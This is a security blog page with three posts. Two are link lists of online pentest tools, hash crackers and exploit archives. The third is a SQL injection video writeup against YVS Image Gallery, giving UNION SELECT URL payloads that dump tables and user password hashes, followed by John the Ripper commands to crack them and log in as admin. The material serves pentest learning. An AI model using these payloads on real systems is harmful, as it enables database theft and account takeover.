rss
twitter
  •  

Online Penetration Testing Tools

| Posted in Security Articles |

5

I saw this post on eLearnSecurity and decided to share. I will be updating as time goes on.

Information gathering:
(multi) http://www.subnetonline.com/
(multi) http://ping.eu/
(multi) http://serversniff.net/
(multi)http://www.yougetsignal.com/
(dig/nslookup,whois,traceroute) http://networking.ringofsaturn.com/Tools/
(whois,dns_tools,service_scan,traceroute) http://centralops.ne…http://centralops.ne…http://centralops.net/co/DomainDossier.aspx
(whois,dns_tools,domain_search) http://www.whois.ws/
(whois,dns_tools) http://www.robtex.com/
(whois) http://www.ripn.net:8080/nic/whois
(domain_search) http://searchdns.netcraft.com/
(iplookup,BGP AS lookup)http://bgp.he.net/
(ASN search) http://fixedorbit.com/search.htm
(dns,whois, network lookup, …) www.network-tools.com

Exploit Search:
(google engine)http://exploitsearch.com/
(nvd,osvdb,metasploit,…)http://www.exploitsearch.net/
(engine) http://shodan.surtri.com/
http://www.hack0wn.com/advisories.php
http://www.1337day.com/
http://www.exploit-db.com/
http://securityvulns.com/
http://www.zerodayin…http://www.zerodayinitiative.com/advisories/published/
http://seclists.org/fulldisclosure/
https://web.nvd.nist…https://web.nvd.nist.gov/view/vuln/search?cid=3
https://www.us-cert….https://www.us-cert.gov/cas/techalerts/
http://www.cvedetails.com/
http://routerpwn.com/

Scanning networks,web structures,..
(nmap,openvas,sqlix,sqlmap,nikto,sub_domain) http://hackertarget….http://hackertarget.com/free-security-vulnerability-scans/
(nmap,traceroute,whois) http://hackerfantastic.com/
(structure) http://madnet.name/tools/madss/
(SQLi,XSS,..)http://hackvertor.co.uk/public
(structure) http://sucuri.net/index.php?page=scan
(Drupal Vulnerability Scanner) http://raz0r.name/drupalscan/
(Joomla scanner) https://www.joomlascan.com/
(Cross Site Scripting Scanner) http://xss-scanner.com/
(SQLi) http://www.be007.gig…http://www.be007.gigfa.com/scanner/scanner.php
(SQLi) http://scanner.drie88.tk/
(SQLi) http://www.localvn.b…http://www.localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan/
(SQLi) http://wolfscps.com/gscanner.php

Hack tools store: http://hackarmoury.com/tools

  XSS Guide:
http://www.owasp.org…http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
http://www.businessi…http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php
http://www.googlebig…http://www.googlebig.com/forum/xss-cheats-t-18771.html
http://ha.ckers.org/xss.html
http://utf-8.jp/public/jjencode.html
http://0x416d73.name/jstb/

SQL Injection Guide
http://ha.ckers.org/sqlinjection/
http://pentestmonkey.net/cheat-sheets/
http://ferruh.mavitu…http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

netcat cheat sheet: http://www.sans.org/…http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
hping3 cheatsheet: http://sbdtools.goog…http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf
Nmap5: http://sbdtools.goog…http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf
Metasplot meterpreter: http://rmccurdy.com/…http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html

Browser test:
http://www.browserscope.org/

Encode/Decode:
http://www.crypo.com/
http://coderstoolbox.net/string/
http://ostermiller.o…http://ostermiller.org/calc/encode.html
http://www.showmycode.com/
http://home2.paulsch…http://home2.paulschou.net/tools/xlate/
http://passwordforen…http://passwordforensics.com/online-tools.php

Shellcode to exe:
http://tools88.com/s…http://tools88.com/safe/shellcode_2_exe.php
http://freechina.org…http://freechina.org.ru/shellcode_2_exe.php
http://sandsprite.co…http://sandsprite.com/shellcode_2_exe.php

Wordlists:
http://contest-2010….http://contest-2010.korelogic.com/wordlists.html
http://packetstormse…http://packetstormsecurity.org/Crackers/wordlists/
http://www.skullsecu…http://www.skullsecurity.org/wiki/index.php/Passwords
http://www.ericheitz…http://www.ericheitzman.com/passwd/passwords/

Hashcrack:
(lm,ntlm,md5,mysql/3/4) http://hashcrack.com/
(md5,sha1) http://md5.rednoize.com/
(md5,sha1) http://isc.sans.org/…http://isc.sans.org/…http://isc.sans.org/tools/reversehash.html
(md5) http://www.tmto.org/…http://www.tmto.org/pages/passwordtools/hashcracker/
(md5,lm) http://www.c0llision.net/webcrack.php
(md5) http://md5cracker.tk/
(md5) http://www.hashchecker.de/
(md5) http://askcheck.com/
(md5) http://www.kinginfet.net/md5_cracker/
(lm) http://lmcrack.com/
(lm) http://cracker.offensive-security.com/
(md5) http://gdataonline.com/seekhash.php
(md5) http://opencrack.hashkiller.com/
(md5) http://cracker.fox21.at/
(md5) http://md5crack.com/
(md5) http://md5decryption.com/
(md5) http://authsecu.com/…http://authsecu.com/decrypter-dechiffrer-cracker-hash-md5/decrypter-dechiffrer-cracker-hash-md5.php
(md5) http://hash.insidepro.com/
(md5) http://md5decrypter.com/
(md5) http://md5pass.info/
(md5) http://crackfor.me/
(md5) http://www.xmd5.org/
(md5) http://socialware.ru/md5_crack.php
(md5) http://md5.my-addr.c…http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php
(md5) http://www.md5cracker.com/
(md5) http://www.md5decrypter.co.uk/
(md5) http://md5.noisette.ch/
(md5) http://md5.igrkio.in…http://md5.igrkio.info/md5-hash-database.html
(md5) http://www.hashhack.com
(WebSphere) http://www.sysman.nl/wasdecoder/
(SHA1/MD5 hash cracker on ATI and NVIDIA GPUs) http://www.golubev.com/hashgpu.htm
(Default Password List) http://www.phenoelit…http://www.phenoelit-us.org/dpl/dpl.html

Analysis Malware:
(AV) http://www.virustotal.com/
(AV) http://www.virscan.org/
(AV) http://virusscan.jotti.org/
(analysis system)http://mwanalysis.or…http://mwanalysis.org/?site=1&page=submit
(behavior analysis) http://anubis.iseclab.org/
http://www.netscty.com/malware-tool
(behavior analysis) http://mwanalysis.or…http://mwanalysis.org/?site=1&page=submit
(javascript,flash) http://wepawet.cs.ucsb.edu/

Google Pentest BookmarksList : https://code.google….https://code.google.com/p/pentest-bookmarks/wiki/BookmarksList

50 Links & Resources about Information Security, Pentesting and Cyber News

| Posted in Security Articles |

1

I came across this during one of my e-trolling sessions.

Enjoy.

I decided to share my 50 favorite links and resources for information security, penetration testing, Linux, programming, cyber warfare and other cyber security related stuffs in this article. The no.1 spot doesn’t really mean it is ranked according to my own judgement and preference but these websites are really my top 50 all time favorite links.

1. Packet Storm

An exploit database website that offers full disclosure of the exploits submitted for their archive since 1998.

2. Exploits Database by Offensive Security

The Exploit Database (EDB) is another good resource for cool archives about exploits and vulnerable software. If you are into inserting dorks in Google, then you might want to check out their Google Hacking Database.

3. Metasploit Unleashed by Offensive Security

The website is a free information security resource for learning the Metasploit Framework and it’s actuality an effort to promote awareness and raise funds for the underprivileged children in East Africa.

4. Schneier on Security

Bruce Schneier’s blog about Information Security. I like the Cryptography section of his blog which includes Algorithm Analyses, Algorithm Descriptions, his security papers and many more.

5. ClubHACK Magazine

ClubHack Mag is the 1st Indian Hacking Magazine and that their official website is where their free magazines can be downloaded and where recent articles for the current issue are published. What makes them cool is that they provide free information.

6. Open Web Application Security Project (OWASP)

The official website of the OWASP is cool place to get good resources about web application security and penetration testing.

7. BackBox Linux

BackBox Linux is my favorite pentesting distro because of its sleek performance and smoothness. Its DE is XFCE and I advise you try this too if you are a BackTrack user.

8. BackTrack Linux

BackTrack is one of the most popular pentesting distro and also my favorite distro because of the tools pre-installed on this distribution. I always check their forum site for tutorials and tips about penetration testing.

9. Attrition.org

Beware plagiarists, fake security experts, self-proclaimed hackers, and liars. Attrition / Security errata will pawn you till the 4th dawn for they demystify some conspiracies and the truth about some security companies and authors who only say half truth about their works. Security Errata’s articles, works, and categories include; Legal Threats, Certified Pre-owned, Autofail, Charlatans, Plagiarism, Security Companies, Security Companies that Spam, Other Company Incidents, Statistics, The Media (FIN), Security Software Vulnerabilities, and Data Loss / Data Theft.

10. Social Engineering – Security Through Education

The official website of the Social Engineering Framework(Art Of Human Hacking). An online resource material for understanding Social Engineering and some of the tools employed by hackers to achieve an attack vector.

11. BugTraq

BugTraq or Security Focus is another exploit archive that moderates mailing list that contains exploits, vulnerabilities, and cyber news submitted by infosec enthusiasts and hackers.

12. LeetUpload

An online hacker’s database that allows users to submit or upload files, exploits, botnets, trojans, worms, malwares,etc.

13. Exploit-ID

Exploit Information Disclosure is an exploit archive where I also visit to check out for alternative reasons.

14. Soldierx.com

Soldierx is an online community of penetration testers, hackers, and programmers. This is where I check out some of the projects of the SoldierX crew, tools, tutorials, hacker information database and many more.

15. SkullSecurity

SkullSecurity is a security blog maintained by Ron Bowes who is a gold GIAC-certified penetration tester (GPEN).

16. thomascannon.net

One of the cool websites you should visit is he official website of Thomas Cannon who is an Android Security Researcher, CISSP, CISM, OSCP, CFIP and CSIS industry qualifications. He was responsible for the android data stealing and the No-privilege Android remote shell vulnerabilities.

17. zx2c4

zx2c4 a.k.a Jason A. Donenfeld is a security researcher who wrote a POC of the Linux Local Privilege Escalation via SUID /proc/pid/mem Write (root exploit for 2.6.39 – 3.0.14 kernels). Jason has some good stuffs in his blog like the Answers to Stripe’s Capture the Flag, wifi-monitong scripts, stunnel interceptor, WEPAutoCrack.py and many more.

18. W3Schools

W3Schools is an online tutorial and cheat sheet for HTML, CSS, JavaScript, XML, XSL, ASP, SQL, ADO, VBScript, PHP, etc.

19. michaelboman.org

michaelboman.org is an information security blog maintained by Michale Boman who is a security expert in the fields of vulnerabilities and malicious code.

20. howtohackwebsite.com

The domain may not sound too ethical but no need to worry because it is a safe blog initiated by iSARG Security Group. The blog contains how to conduct penetration tests, ethical hacking, security practices, Linux tutorials and many more.

21. Pir8geek

Pir8geek is a blog about Open Source and Linux Goodies by pr3p who happens to be one of the admins of ProjectX Blog.

22. Inj3ct0r Exploit DataBase

An exploit or vulnerability online archive site for software, web applications, and security resources.

23. Synfyre

Synfyre is a website coded by n1tr0b who is a Security Adventist and PHP geek. He happens to be one of our bloggers and supports our aim as well.

24. Eric Romang Blog

Eric Romang Blog aka aka wow on ZATAZ.com is a simple yet cool blog about penetration testing wherein they try the new CVE’s using the Metasploit Framework. As of this moment writing this article, their new post is entitled “CVE-2008-5036 VLC Media Player RealText Subtitle Overflow Metasploit Demo”.

25. /dev/ttyS0

/dev/ttyS0 is a blog about embedded systems or devices hacking. Their admin of this blog is from Tactical Network Solutions who wrote reaver which is wps bruteforce tool. The goal of the blog is “to provide the necessary tools, skills, and knowledge to enable professionals, hobbyists, hackers and makers to enter into the world of embedded devices!”

26. SecurityTube

SecurityTube.net is website that contains free training videos about penetration testing, cracking, hacking, etc. which started in 2007. It is where some infosec professionals and enthusiasts share their knowledge by uploading their videos or watching other videos. Vivek Ramachandran is the Founder and Chief Trainer at SecurityTube.net. As of now, SecurityTube is now offering certifications like SecurityTube Metasploit Framework Expert and SecurityTube Wi-Fi Security Expert.

27. Security Mailing List Archive

Internet Security Resource Website that gives full disclosure about tools, information security, cyber news, issues, problems, tools, link sharing, and many more.

28. Darknet

A website about Ethical Hacking, Penetration Testing and Computer Security which basically contains interesting infosec related news, tools and more. For those of you who don’t know, Darknet is also my inspiration on the initiative of improving ProjectX Blog as an international and global information security blog which was first conceptualized by kapitanluffy.

29. Cyber Security Video Podcast

The home page for the Cyber Security video podcast series by Cyber Mike who is a cyber security and information assurance architect by profession, with over 27 years working in engineering, and the last 15 years focused on IA and cyber security. The podcast is about IT cyber security education and not about how to perform cyber attacks and exploits.

30. Finux Tech Weekly

Finux Tech Weekly is another podcast website initiated by Arron Finnon’s aka who ventures into his own independent podcast about Tech, Security and general geekyness.

31. Exploit This

Exploit This is a blog about the security news, current exploits, security advisories and vulnerabilities.

32. ROOTCON

ROOTCON is the premier hacking conference in the Philippines and where I started blogging about information security and geeky stuffs. If you want to check the articles I posted there just click this link.

33. Errata Security

The official blog of Errata Security which claims to be a high-end cyber security consulting company. Their articles are cool so you should try visiting this guys ;)

34. Infosec Island

Infosec Island serves our daily dose of infosec news and cyber related stuffs. Categories include; Cloud Computing, Compliance, Database Security, Encryption, Network Security, OS & Software, Infosec Island News, Security Management, Social Engineering, Social Engineering, Vulns & Alerts, Web App Security, and Wireless Security.

35. Coresec.org

Coresec is an Information Security Blog that deals about penetration testing, vulnerability assessment, security research, web application, tools guide, etc. This is where I check out some new penetration testing guides.

36. Phrack

Nothing beats the old school! Nobody messes with the Phrack Magazine which is an online ezine for hackers and by the hackers. Phrack was first released on November 17, 1985 which until now became the largest computer underground ezine. In fact, The Hacker’s Manifesto was also published in this online ezine on the 7th issue. Truly an old yet awesome archive which takes you to the old days of the hacker culture in the 80′s.

37. Blackbuntu Linux

Blackbuntu Linux is another penetration testing distro based on Ubuntu. The official website of Blackbuntu includes good tutorials for pentesting under the blog and forum section.

38. r00tsecurity

r00tsecurity is an online forum site put together by hackers, computer geeks, and tech enthusiasts. Aside from being a forum, r00tsecurityhas has a good online archive for exploits, POC, advisories, scripts, sample programs, ezines, tools, cheat sheets and many more.

39. Th3-0uTl4wS

Th3 0uTl4wS is not only an online forum community of hackers, crackers, computer geeks, skiddies, infosec enthusiasts, etc. It has an online archive of downloadable tools, honeypots, ezines, ebooks, wordlists, tutorials, botnets, backdoor shells, scripts etc. I advise that you should be careful on the files that you will be downloading too. The website offers free services of their online tools like Md5 Cracker, URL Decoder/Encoder, Base64 Converter, Admin Finder, ASCII Converter, Online photoshop editor, and many more.

40. Linuxaria

Linuxaria is a blog review about anything that falls under GNU/Linux and Open Source. A good resource for some Linux tips, games, tools, advisories, etc.

41. Root Prompt

Are you a Unix user? Then this site is definitely for you! It contains nothing but Unix news and lots of good info.

42. Hack A Day

The place where electronic hacks are raped. A good site for punching in your hardware hacking ideas.

43. Vaxman.de

The personal website of Dr. Bernd Ulmann from Germay is a collection of his hobbies and projects focused on old computing machinery – especially machines from the former DIGITAL-Equipment-Corporation. This guy is an OpenVMS geek.

44. Hack in the Box

The HITB Network is a good security news website.

45. SecurityXploded

SecurityXploded is an Infosec Research and Developmental portal founded on April 2007. The site focuses on Anti-Spyware, Reverse Engineering, Cryptography, Password Recovery, Network security, Forensics, etc. For me, their articles are written and good quality and has a lot of cool tools developed for pentesting, hacking and security. I totally salute the SX team for the Metasploit modules they published.

46. DEFCON

The official website of the most famous hacker conference in the world.

47. Iron Geek

Adrian Crenshaw’s Information Security site and the home of my favorite open source vulnerable web application for penetration testing.

48. RETROCMP

The site claims to be a for restauration of classic computers, and what can I say.. it truly is a site about my favorite old computer machines especially from DEC or |d|i|g|i|t|a|l|. They have cool articles like Connecting a DECserver to modern Linux, Interfacing with a PDP-11/05, Dealing with Backplanes, DECNet and many more.

49. Linux Journal

My other resource for Linux news and tips.

50. CIRT.net

The home of Nikto Web Scanner and the place where I check the default usernames and passwords for electronic devices, routers, security appliance and many more. Plus, they have some good tools you might wanna check.

– Shipcode

SOURCE: http://www.theprojectxblog.net/50-links-resources-about-information-security-pentesting-and-cyber-news-that-you-should-try-for-a-visit/

[VIDEO] YVS Image Gallery – SQL Injection

| Posted in Security Videos |

14

Download video: http://www.mediafire.com/?mbf1l0ql1514dq3

Brief Overview

 YVS Image Gallery is a small database driven gallery created to be implemented within your existing site. Only a first attempt at the system has a long way to go, but it provides you with all the necessary tools to run your own picture gallery, such as uploading of multiple images and creation of thumbnails.
As reported by Corrado Liotta, YVS Image Gallery is vulnerable to SQL Injection. So basically what I did was to exploit this vulnerability.

 Tools

Commands

//Open on firefox
http://127.0.0.1/server_path/view_all_albums.php
//Check the column count
http://127.0.0.1/YVS1/view_album.php?album_id=1+order+by+1--
http://127.0.0.1/YVS1/view_album.php?album_id=1+union+select+1--

//Get the version, current user and the database name
http://127.0.0.1/server_path/view_album.php?album_id=-2+UNION+SELECT+concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)--

//Get all the tables in the database
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(table_name)+FROM+information_schema.tables+where+table_schema=database()--
//Get all the column names
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(column_name)+FROM+information_schema.columns+where+table_schema=database()--
//Get username & password from the table "user"
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+concat(username,0x3a,password)+from+user--
//The password is md5 encrypted, so we have to decrypt it
//We save the username:hash in a file and name it "pwd.txt"
//We open up a terminal on our backtrack
//We need to Brute Force the user credentials for the web application using John The Ripper
cd pentest/passwords/john
./john pwd.txt --wordlist=password.txt --format=raw-MD5
//where password.txt is our password wordlist
//John the ripper then cracks the hash and gives us the password
//After which we then login to the YVS Image Gallery admin panel

 #####                          #######
#     #   ##   #    # ######    #     # #    # ###### #####
#        #  #  ##  ## #         #     # #    # #      #    #
#  #### #    # # ## # #####     #     # #    # #####  #    #
#     # ###### #    # #         #     # #    # #      #####
#     # #    # #    # #         #     #  #  #  #      #   #
 #####  #    # #    # ######    #######   ##   ###### #    #

@InfosecShinobi